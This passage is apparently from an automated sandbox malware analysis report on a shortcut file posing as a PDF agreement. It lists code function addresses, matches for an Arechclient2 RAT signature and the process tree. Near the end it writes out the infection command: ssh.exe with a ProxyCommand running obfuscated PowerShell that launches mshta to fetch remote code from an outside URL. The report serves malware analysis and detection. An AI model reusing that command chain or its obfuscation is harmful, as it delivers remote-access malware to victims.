                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00496FE611_2_00496FE6
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004833B711_2_004833B7
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0047D45D11_2_0047D45D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048F40911_2_0048F409
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004694E011_2_004694E0
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0047F62811_2_0047F628
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0046F6A011_2_0046F6A0
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004816B411_2_004816B4
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004878C311_2_004878C3
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00481BA811_2_00481BA8
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048DBA511_2_0048DBA5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00499CE511_2_00499CE5
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0047DD2811_2_0047DD28
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_00481FC011_2_00481FC0
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0048BFD611_2_0048BFD6
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_0133D2BB11_2_0133D2BB
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B1211_2_01346B12
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01346B1911_2_01346B19
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01348B0A11_2_01348B0A
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01348B9211_2_01348B92
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01348AAE11_2_01348AAE
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01330C2511_2_01330C25
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_01347C6F11_2_01347C6F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6C88013_2_02B6C880
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6B01F13_2_02B6B01F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6107013_2_02B61070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6D11013_2_02B6D110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B615E013_2_02B615E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6A8FA13_2_02B6A8FA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6C86213_2_02B6C862
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6A90813_2_02B6A908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6B09E13_2_02B6B09E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6D0F313_2_02B6D0F3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6106013_2_02B61060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B615C313_2_02B615C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6BD7813_2_02B6BD78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_02B6BD4513_2_02B6BD45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0584E61013_2_0584E610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0584F9E813_2_0584F9E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_058411B813_2_058411B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_05844CC013_2_05844CC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDDAD713_2_06CDDAD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD4AA013_2_06CD4AA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD0FA013_2_06CD0FA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD64C013_2_06CD64C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDB8D813_2_06CDB8D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDE4E813_2_06CDE4E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD7CE813_2_06CD7CE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD541813_2_06CD5418
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDBDE613_2_06CDBDE6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDCD1B13_2_06CDCD1B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD4A8F13_2_06CD4A8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD1E6013_2_06CD1E60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD1E3C13_2_06CD1E3C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD0F9113_2_06CD0F91
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD5BA813_2_06CD5BA8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD5BA613_2_06CD5BA6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD5BB113_2_06CD5BB1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD131513_2_06CD1315
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDB8C713_2_06CDB8C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD30C013_2_06CD30C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD30B313_2_06CD30B3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDF44913_2_06CDF449
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD004013_2_06CD0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD540713_2_06CD5407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CD000613_2_06CD0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06CDC43013_2_06CDC430
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E93ED013_2_06E93ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9B6A713_2_06E9B6A7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9C23813_2_06E9C238
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9D04813_2_06E9D048
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E93EBB13_2_06E93EBB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9968813_2_06E99688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9969813_2_06E99698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9AE7B13_2_06E9AE7B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E90FB713_2_06E90FB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E98B8013_2_06E98B80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E98B6513_2_06E98B65
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9032B13_2_06E9032B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9F48013_2_06E9F480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9002713_2_06E90027
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E9D03813_2_06E9D038
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06E985E913_2_06E985E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD463013_2_06FD4630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FDDCD613_2_06FDDCD6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FDE40413_2_06FDE404
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD6DE813_2_06FD6DE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD1D7013_2_06FD1D70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FDB56013_2_06FDB560
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD3D0013_2_06FD3D00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD62F813_2_06FD62F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD4B5813_2_06FD4B58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD309D13_2_06FD309D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD004013_2_06FD0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD59B813_2_06FD59B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD797013_2_06FD7970
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD864A13_2_06FD864A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD462013_2_06FD4620
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD3CF113_2_06FD3CF1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD6DD913_2_06FD6DD9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD15B813_2_06FD15B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD15A813_2_06FD15A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FDCA8813_2_06FDCA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FDCA7A13_2_06FDCA7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD4B3E13_2_06FD4B3E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD186813_2_06FD1868
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_06FD003D13_2_06FD003D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0776DDD013_2_0776DDD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0776634C13_2_0776634C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0776EFF013_2_0776EFF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_0776EFE013_2_0776EFE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D24DD813_2_07D24DD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D2004013_2_07D20040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D24DC913_2_07D24DC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D2071913_2_07D20719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D206BE13_2_07D206BE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D2443813_2_07D24438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 13_2_07D2442713_2_07D24427
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0098B02014_2_0098B020
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0098166314_2_00981663
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00989C8014_2_00989C80
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A23F514_2_009A23F5
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00A0840014_2_00A08400
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B650214_2_009B6502
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0098E6F014_2_0098E6F0
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B265E14_2_009B265E
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A282A14_2_009A282A
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B89BF14_2_009B89BF
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00A00A3A14_2_00A00A3A
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B6A7414_2_009B6A74
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009DEDB214_2_009DEDB2
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ACD5114_2_009ACD51
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_00A00EB714_2_00A00EB7
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009E8E4414_2_009E8E44
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B6FE614_2_009B6FE6
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A33B714_2_009A33B7
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009894E014_2_009894E0
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009AF40914_2_009AF409
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0099D45D14_2_0099D45D
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A16B414_2_009A16B4
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0098F6A014_2_0098F6A0
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0099F62814_2_0099F628
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A78C314_2_009A78C3
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A1BA814_2_009A1BA8
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ADBA514_2_009ADBA5
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009B9CE514_2_009B9CE5
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0099DD2814_2_0099DD28
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009ABFD614_2_009ABFD6
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009A1FC014_2_009A1FC0
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B38214_2_0176B382
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_0176B38914_2_0176B389
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\47891652\updater.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: String function: 00488B30 appears 42 times
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: String function: 00471A36 appears 34 times
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: String function: 00480D17 appears 70 times
                    Source: C:\ahdccea\AutoIt3.exeCode function: String function: 009A0D17 appears 70 times
                    Source: C:\ahdccea\AutoIt3.exeCode function: String function: 00991A36 appears 34 times
                    Source: C:\ahdccea\AutoIt3.exeCode function: String function: 009A8B30 appears 42 times
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3637
                    Source: C:\Windows\System32\mshta.exeProcess created: Commandline size = 3637Jump to behavior
                    Source: 14.2.AutoIt3.exe.442c974.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 11.2.updater.exe.417c974.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 15.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 11.2.updater.exe.417c974.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.3d1c974.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                    Source: Process Memory Space: powershell.exe PID: 6524, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 11.2.updater.exe.417c974.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 14.2.AutoIt3.exe.442c974.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: 16.2.AutoIt3.exe.3d1c974.1.raw.unpack, -Module-.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winLNK@24/74@1/3
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CA6AD GetLastError,FormatMessageW,11_2_004CA6AD
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B8DE9 AdjustTokenPrivileges,CloseHandle,11_2_004B8DE9
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_004B9399
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009D8DE9 AdjustTokenPrivileges,CloseHandle,14_2_009D8DE9
                    Source: C:\ahdccea\AutoIt3.exeCode function: 14_2_009D9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_009D9399
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CB976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,11_2_004CB976
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_004C4148
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004CC9DA CoInitialize,CoCreateInstance,CoUninitialize,11_2_004CC9DA
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeCode function: 11_2_004C443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_004C443D
                    Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\84f8fd1fb316449d9e7b88f8c96e0316
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_itlxbuof.3nd.ps1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\47891652\updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\ahdccea\AutoIt3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\OpenSSH\ssh.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Agreement for Cooperation.PDF.lnk.download.lnkVirustotal: Detection: 31%
                    Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')" .
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('ms]]]]]]h]]]]]]]t]]]]]a.]]]]]ex]]]]]e ]]]]]]]h]]]]]]]tt]]]]]p]]]]]]]s]]]]]]]:]]]]]]//]]]]]]pi]]]]]c]]]]]]]t]]]]]]].he]]]]]a]]]]]]]l]]]]]]t]]]]]]hc]]]]]]l]]]]]]]i]]]]]]]n]]]]]]i]]]]]]c]]]]]]-styl]]]]]]e]]]]]ma]]]]]]]v]]]]]]]e]]]]]n]]]]]]].]]]]]]]com/]]]]]]a]]]]]]]pi]]]]]]/]]]]]u]]]]]]]z/]]]]]]0]]]]]]]912]]]]]]54]]]]]]]51]]]]]64]]]]]]/index]]]]].mp]]]]]4' -replace ']')
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://pict.healthclinic-stylemaven.com/api/uz/0912545164/index.mp4
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
